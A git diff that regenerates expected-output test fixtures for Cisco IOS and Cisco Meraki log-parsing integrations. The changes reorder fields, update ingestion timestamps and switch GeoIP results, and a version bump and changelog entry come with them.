@@ -461,28 +458,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-12-09T13:35:26.832503Z", + "ingested": "2021-12-14T14:40:24.398628571Z", "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -495,9 +474,27 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { @@ -507,20 +504,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -534,28 +525,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-12-09T13:35:26.832509400Z", + "ingested": "2021-12-14T14:40:24.398628952Z", "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -568,6 +541,15 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { @@ -583,7 +565,7 @@ "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-12-09T13:35:26.832517300Z", + "ingested": "2021-12-14T14:40:24.398629359Z", "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -642,7 +624,7 @@ "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-12-09T13:35:26.832521600Z", + "ingested": "2021-12-14T14:40:24.398629977Z", "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -658,6 +640,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { 
@@ -667,20 +658,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -694,28 +679,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-12-09T13:35:26.832527Z", + "ingested": "2021-12-14T14:40:24.398630399Z", "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -728,9 +695,29 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "john.smith" + ], + "ip": [ + "10.2.55.3" + ] + }, "log": { "level": "notification", "source": { 
@@ -748,27 +735,10 @@ "ip": "10.2.55.3" }, "message": "Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "john.smith" - ], - "ip": [ - "10.2.55.3" - ] - }, "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-12-09T13:35:26.832533500Z", + "ingested": "2021-12-14T14:40:24.398630786Z", "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", @@ -780,6 +750,12 @@ "action": "Login", "facility": "SEC_LOGIN" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { @@ -807,17 +783,17 @@ "address": "10.5.36.9", "ip": "10.5.36.9" }, - "message": "User john.smith has exited tty session 5(10.5.36.9)", "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-12-09T13:35:26.832539800Z", + "ingested": "2021-12-14T14:40:24.398631171Z", "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", "type": "info" }, + "message": "User john.smith has exited tty session 5(10.5.36.9)", "cisco": { "ios": { "action": "exited", @@ -836,6 +812,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { 
@@ -851,26 +836,11 @@ "ip": "10.4.5.66" }, "message": "Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:35:26.832546Z", + "ingested": "2021-12-14T14:40:24.398631569Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -890,9 +860,24 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { @@ -908,26 +893,11 @@ "ip": "10.4.5.66" }, "message": "Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:35:26.832551200Z", + "ingested": "2021-12-14T14:40:24.398632091Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -950,6 +920,12 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { 
@@ -965,7 +941,7 @@ "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-12-09T13:35:26.832556400Z", + "ingested": "2021-12-14T14:40:24.398632495Z", "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", @@ -995,7 +971,7 @@ "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-12-09T13:35:26.832560700Z", + "ingested": "2021-12-14T14:40:24.398632946Z", "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index 40e349f8834..1ad4598ec8e 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ios title: Cisco IOS -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs from Cisco IOS with Elastic Agent. type: integration diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index 7b15da6b167..c72cc736f7c 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index f5f24b350da..49f5e955a54 100644 
--- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "event": { - "ingested": "2021-09-07T12:47:57.558223400Z" + "ingested": "2021-12-14T14:40:26.865179859Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "event": { - "ingested": "2021-09-07T12:47:57.558248900Z" + "ingested": "2021-12-14T14:40:26.865183014Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "event": { - "ingested": "2021-09-07T12:47:57.558277900Z" + "ingested": "2021-12-14T14:40:26.865183516Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "event": { - "ingested": "2021-09-07T12:47:57.558284300Z" + "ingested": "2021-12-14T14:40:26.865183939Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "event": { - "ingested": "2021-09-07T12:47:57.558289900Z" + "ingested": "2021-12-14T14:40:26.865184398Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "event": { - "ingested": "2021-09-07T12:47:57.558295200Z" + "ingested": "2021-12-14T14:40:26.865184790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "event": { - "ingested": "2021-09-07T12:47:57.558300600Z" + "ingested": "2021-12-14T14:40:26.865185196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "event": { - "ingested": "2021-09-07T12:47:57.558305800Z" + "ingested": "2021-12-14T14:40:26.865185595Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "event": { - "ingested": "2021-09-07T12:47:57.558310900Z" + "ingested": "2021-12-14T14:40:26.865186001Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "event": { - "ingested": "2021-09-07T12:47:57.558316300Z" + "ingested": "2021-12-14T14:40:26.865186421Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "event": { - "ingested": "2021-09-07T12:47:57.558323100Z" + "ingested": "2021-12-14T14:40:26.865186810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "event": { - "ingested": "2021-09-07T12:47:57.558328600Z" + "ingested": "2021-12-14T14:40:26.865187583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "event": { - "ingested": "2021-09-07T12:47:57.558333400Z" + "ingested": "2021-12-14T14:40:26.865193925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "event": { - "ingested": "2021-09-07T12:47:57.558338200Z" + "ingested": "2021-12-14T14:40:26.865194409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "event": { - "ingested": "2021-09-07T12:47:57.558343100Z" + "ingested": "2021-12-14T14:40:26.865194848Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "event": { - "ingested": "2021-09-07T12:47:57.558347800Z" + "ingested": "2021-12-14T14:40:26.865195246Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "event": { - "ingested": "2021-09-07T12:47:57.558352300Z" + "ingested": "2021-12-14T14:40:26.865195803Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "event": { - "ingested": "2021-09-07T12:47:57.558357Z" + "ingested": "2021-12-14T14:40:26.865196202Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "event": { - "ingested": "2021-09-07T12:47:57.558368100Z" + "ingested": "2021-12-14T14:40:26.865196606Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "event": { - "ingested": 
"2021-09-07T12:47:57.558373Z" + "ingested": "2021-12-14T14:40:26.865197015Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "event": { - "ingested": "2021-09-07T12:47:57.558377500Z" + "ingested": "2021-12-14T14:40:26.865197424Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "event": { - "ingested": "2021-09-07T12:47:57.558382400Z" + "ingested": "2021-12-14T14:40:26.865197824Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "event": { - "ingested": "2021-09-07T12:47:57.558386800Z" + "ingested": "2021-12-14T14:40:26.865198217Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "event": { - "ingested": "2021-09-07T12:47:57.558391200Z" + "ingested": "2021-12-14T14:40:26.865198736Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "event": { - "ingested": "2021-09-07T12:47:57.558395800Z" + "ingested": "2021-12-14T14:40:26.865199145Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "event": { - "ingested": "2021-09-07T12:47:57.558404500Z" + "ingested": "2021-12-14T14:40:26.865199593Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "event": { - "ingested": "2021-09-07T12:47:57.558409300Z" + "ingested": "2021-12-14T14:40:26.865200016Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amnih 
1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "event": { - "ingested": "2021-09-07T12:47:57.558414200Z" + "ingested": "2021-12-14T14:40:26.865200438Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "event": { - "ingested": "2021-09-07T12:47:57.558418300Z" + "ingested": "2021-12-14T14:40:26.865200831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "event": { - "ingested": "2021-09-07T12:47:57.558422300Z" + "ingested": "2021-12-14T14:40:26.865201229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "event": { - "ingested": "2021-09-07T12:47:57.558426800Z" + "ingested": "2021-12-14T14:40:26.865201635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "event": { - "ingested": "2021-09-07T12:47:57.558430900Z" + "ingested": "2021-12-14T14:40:26.865202032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 
mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "event": { - "ingested": "2021-09-07T12:47:57.558434700Z" + "ingested": "2021-12-14T14:40:26.865202427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "event": { - "ingested": "2021-09-07T12:47:57.558440800Z" + "ingested": "2021-12-14T14:40:26.865202814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "event": { - "ingested": "2021-09-07T12:47:57.558445Z" + "ingested": "2021-12-14T14:40:26.865203340Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "event": { - "ingested": "2021-09-07T12:47:57.558449200Z" + 
"ingested": "2021-12-14T14:40:26.865203752Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "event": { - "ingested": "2021-09-07T12:47:57.558453100Z" + "ingested": "2021-12-14T14:40:26.865204147Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "event": { - "ingested": "2021-09-07T12:47:57.558456800Z" + "ingested": "2021-12-14T14:40:26.865204543Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "event": { - "ingested": "2021-09-07T12:47:57.558460600Z" + "ingested": "2021-12-14T14:40:26.865204930Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam rad.loi isc_ ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "event": { - "ingested": "2021-09-07T12:47:57.558464500Z" + "ingested": "2021-12-14T14:40:26.865205321Z" + }, + 